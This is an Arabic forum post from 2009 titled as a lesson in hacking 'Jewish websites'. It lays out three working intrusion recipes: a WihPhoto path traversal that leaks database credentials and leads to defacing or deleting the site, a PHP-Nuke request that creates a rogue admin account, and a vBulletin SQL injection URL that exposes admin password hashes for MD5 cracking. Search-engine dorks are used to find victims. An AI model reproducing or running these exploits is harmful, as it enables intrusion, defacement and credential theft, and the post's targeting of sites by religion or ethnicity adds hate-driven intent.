اخوانى الاعزاء بعد التحية
اقدم لكم مجموعة من الثغرات التى يمكن ان تفيدك فى اختراق المواقع اليهودية
الثغرات بالترتيب
1-ثغرة الوينب فوتو
المتطلبات
محرك بحث مثل جوجل او التافيستا او هوت او الياهو
الـــشـــرح
بسم الله نبدأ الشرح
افتح موقع جوجل واكتب في مربع البحث powered by wihphoto راح تطلعلك مواقع وايد نختار منها هذا الموقع للشرح
http://163.16.11.5/~photo/index.html تروح عند address bare اللي تحط فية عنوان الموقع وتحذف كلمة index.php وتحط بدالها sendphoto.php?album=..&pic=config.inc.php
ومو شرط تكون اخر كلمة index.php مرات تكون admin.php
شللي صار؟؟؟ اطلعت لنا صفحة جديدة فيها مستطيل وفوقة مكتوب Send config.inc.php to
انت كل اللي عليك تحط ايميلك بهذا المربع وتظغط على send
وبعدة راح تجيلك رسالة مرفقة بملف اسمة ._albums_.._config.inc.php
اظغط بيمن الماوس على الملف المرفق واختار properties وانسخ عنوان الملف المرفق اللي هو
http://64.4.10.250/cgi-bin/getmsg/....6628b5 ccc006e
والصقة في المتصفح وفتح اللنك راح تطلعلك صفحة مكتوب فيها هالكلام
/************************************************** ***************************/
/* Script: WihPhoto (PHP4) */
/* Version: 0.86-dev */
/* Datum: 26.September 2001 */
/* Autor: Michael Wihsbِ
k */
/* E-Mail:
michael@wihsy.com */
/* URL:
Currently offline ... */
/* */
/* */
/* */
/* --> FREE FOR NON-COMMERCIAL USE </WihPhoto>
بصراحة اللي يهمنا شي واحد من اللكلام هذا كلة واللي هو
// MySQL-DB Einstellungen
// ======================
$database = "WihPhoto"; // MySQL Datenbankname
$sqlhost = "localhost"; // MySQL Hostname
$sqluser = "photo"; // MySQL Username
$sqlpass = "schphoto"; // MySQL Passwort
هذا الجزء ؟
اظن انة ما يحتاج شرح
الهوست او عنوان الموقع عندك :163.16.11.5
اليوزر نيم قدامك hoto
والباسوورد قدامك :schphoto
اللحين طير على الفرونت بيج وصمم صفحة خاصة فيك
ولا تتعب نفسك بجوهن ذا ريبر ولا غيره
وافتح برنامج نقل الملفات واحذف محتويات الموقع او غير الصفحة الرئيسية ...انت ومزاجك
_____________________________________
2-ثغرة مجلة النيوك
بسم الله الرحمن الرحيم
بالامكان ان تخترق موقع او منتدى فى اقل من دقيقة باستغلال ثغرة فى مجلة النيوك بي اتش بي
الخطوة الاول اذهب الى محرك بحث google وابحث عن "ultramode.txt"
المواقع نتائج البحث ابداء بفتحا الواحد تلو الاخر وتعالى الى نهاية اسم الموقع وانسخ ما يلي:
admin.php?op=AddAuthor&add_aid=tigersha
r
k&add_name=God&add_pwd=coolpass&
add_email=foo@bar.com&add_radminsuper=
1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
ثم اضغط انتر اذا صادفتك الصفحة التالية خانتين الاولى لاسم المستخدم والثانية للباسورد
واكتب فى الخانتين
username "tigersharck" and password "coolpass".
استمتع بعد دخولك بالموقع وان لم تنجح جرب مع اخر
__________________________________________________ ____________
3- ثغرة اخر المواضيع
الثغرة في : منتديات vBulletin
الإصدارات المصابة : تقريباً جميع الإصدارات vb2 و vb3
ملف الثغرة : أخر عشر مواضيع
طريقة الإختراق :
إذهب إلى أي محرك بحث مثل google.com
وأكتب :
powered by: vbulletin version 3
أو
powered by: vbulletin version 2
إختر أحد المنتديات اللتي ظهرت لك ثم ضع بعد رابط المنتدى مباشرة هذا الكود
http://www.[target].com/vb/last.php?fsel=,user.password%20as%20title,user.%20 username%20as%20lastposter%20FROM%20user,thread%20 %20WHERE%20usergroupid=6%20LIMIT%201/*
وغير كلمة target
التي بين الاقواس وضع عنوان المنتدى المراد اختراقه
مع ملاحظة أن بعض المنتديات اسم ملف أخر المواضيع مختلف عندها مثلاً : ttlast.php / last10.php / last.php
بعد إضافة الكود إضغط إنتر وسوف يظهر لك باسورد المشرف العام في شريط اخر المواضيع
إنظر الصورة
انسخ الباسورد واسم المشرف العام واحفظهن عندك
وبكذا تكون حصلت على أهم شيء
والباقي عليك هو فك تشفير الباسورد بأي برنامج مختص بذلك وتم شرح برنامج في المنتدى
يقوم بفك تشفير MD5
وهناااك ايضا موقع يتكفل بفك شفرة MD5
تفضلوا رابط الموقع
http://passcracking.com كما يوجد برامج لاختراق المواقع هيا استخدمها في اختراق المواقع اليهودية
منقووووول...
موضوع: تعلم كيف تخترق المواقع اليهودية 
الخميس يناير 22, 2009 9:41 pm